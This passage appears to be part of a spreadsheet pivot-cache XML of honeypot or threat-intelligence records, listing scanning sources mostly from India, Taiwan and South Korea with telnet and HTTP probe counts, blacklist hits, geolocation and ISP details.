    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:be9a:3092"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3630"/>
    <x v="3630"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T02:20:08"/>
    <d v="2025-04-02T02:20:08"/>
    <d v="2025-04-02T02:20:08"/>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f:b9f7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3631"/>
    <x v="3631"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T02:19:04"/>
    <d v="2025-04-02T02:19:04"/>
    <d v="2025-04-02T02:19:04"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PB"/>
    <s v="Punjab"/>
    <s v="Ludhiana"/>
    <s v="Māchhīwāra"/>
    <s v="1264644"/>
    <s v="NA"/>
    <s v="30.9156"/>
    <s v="76.2002"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb7:9faf"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3632"/>
    <x v="3632"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T02:14:49"/>
    <d v="2025-04-02T02:14:49"/>
    <d v="2025-04-02T02:14:49"/>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2:957a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3633"/>
    <x v="3633"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T02:12:38"/>
    <d v="2025-02-17T06:04:09"/>
    <d v="2025-04-02T02:12:38"/>
    <n v="22"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="2005-08-23"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7d8a:dcb0"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3634"/>
    <x v="3634"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T02:11:23"/>
    <d v="2025-04-02T02:11:23"/>
    <d v="2025-04-02T02:11:23"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb7:7d1c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3635"/>
    <x v="3635"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T02:09:00"/>
    <d v="2025-04-02T02:09:00"/>
    <d v="2025-04-02T02:09:00"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Kanniyakumari"/>
    <s v="Nagercoil"/>
    <s v="1262204"/>
    <s v="NA"/>
    <s v="8.17899"/>
    <s v="77.4323"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:fab9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3636"/>
    <x v="3636"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T02:04:45"/>
    <d v="2025-04-01T18:07:25"/>
    <d v="2025-04-02T02:04:45"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:21c1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3637"/>
    <x v="3637"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T01:03:53"/>
    <d v="2025-04-01T20:07:54"/>
    <d v="2025-04-02T01:03:53"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="17813"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="MTNL Mumbai"/>
    <s v="2004-11-30"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb4:a015"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3638"/>
    <x v="3638"/>
    <s v="220-135-64-179.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T00:39:33"/>
    <d v="2024-04-14T09:30:29"/>
    <d v="2025-04-02T00:39:33"/>
    <n v="280"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H39"/>
    <s v="47213&amp;&amp;23&amp;&amp;25593&amp;&amp;57598&amp;&amp;60358"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc87:40b3"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3639"/>
    <x v="3639"/>
    <s v="125-229-248-189.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T00:38:34"/>
    <d v="2023-07-25T03:26:07"/>
    <d v="2025-04-02T00:38:34"/>
    <n v="7423"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_SMB_H7&amp;&amp;SMA-LAB_HTTPS_H27&amp;&amp;SMA-LAB_IPP_H19&amp;&amp;SMA-LAB_HTTP_H1&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_SOCKS5_H19&amp;&amp;SMA-LAB_PJL_H7&amp;&amp;SMA-LAB_DNS_H42&amp;&amp;SMA-LAB_LDAP_H1&amp;&amp;SMA-LAB_SSH_H34&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H22"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;445&amp;&amp;443&amp;&amp;631&amp;&amp;80&amp;&amp;5900&amp;&amp;1080&amp;&amp;9100&amp;&amp;53&amp;&amp;389&amp;&amp;22&amp;&amp;27542&amp;&amp;23&amp;&amp;NA&amp;&amp;53589&amp;&amp;53596&amp;&amp;53606&amp;&amp;53621&amp;&amp;53631&amp;&amp;53643&amp;&amp;53656&amp;&amp;53673&amp;&amp;53689"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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None"/>
    <x v="31"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:7de5:f8bd"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3640"/>
    <x v="3640"/>
    <s v="NA&amp;&amp;59-126-128-101.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-02T00:35:18"/>
    <d v="2024-08-30T07:45:40"/>
    <d v="2025-04-02T00:35:18"/>
    <n v="1108"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_SMTP_H38&amp;&amp;SMA-LAB_SOCKS5_H12&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H21"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;NA&amp;&amp;80&amp;&amp;25&amp;&amp;1080&amp;&amp;64162&amp;&amp;23&amp;&amp;9100"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;GET&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL: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None"/>
    <x v="31"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:3b7e:8065"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3641"/>
    <x v="3641"/>
    <s v="NA&amp;&amp;59-127-112-121.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-02T00:34:30"/>
    <d v="2023-07-29T18:57:11"/>
    <d v="2025-04-02T00:34:30"/>
    <n v="349"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="17844&amp;&amp;23&amp;&amp;NA"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET: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3b7f:7079"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3642"/>
    <x v="3642"/>
    <s v="1-34-200-86.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T00:33:28"/>
    <d v="2024-02-11T18:27:00"/>
    <d v="2025-04-02T00:33:28"/>
    <n v="6230"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H12&amp;&amp;SMA-LAB_LDAP_H19&amp;&amp;SMA-LAB_PJL_H39&amp;&amp;SMA-LAB_NTP_H6&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_DNS_H25&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_VNC_H20&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H43&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_TELNET_H30"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;389&amp;&amp;9100&amp;&amp;123&amp;&amp;445&amp;&amp;53&amp;&amp;80&amp;&amp;5900&amp;&amp;721&amp;&amp;39265&amp;&amp;33433&amp;&amp;33441&amp;&amp;33451&amp;&amp;23"/>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2010-05-05"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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122:c856"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3643"/>
    <x v="3643"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T00:29:55"/>
    <d v="2025-04-02T00:23:14"/>
    <d v="2025-04-02T00:29:55"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="cellular"/>
    <s v="Cdma Project"/>
    <s v="2007-08-01"/>
    <s v="CDMA-BB"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fe:b148"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3644"/>
    <x v="3644"/>
    <s v="NA&amp;&amp;122-117-59-154.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-02T00:24:52"/>
    <d v="2023-10-24T01:36:06"/>
    <d v="2025-04-02T00:24:52"/>
    <n v="491"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_H32&amp;&amp;SMA-LAB_SIP_H37&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H22"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;5060&amp;&amp;16607&amp;&amp;80&amp;&amp;23&amp;&amp;NA&amp;&amp;50732&amp;&amp;9100"/>
    <s v="True"/>
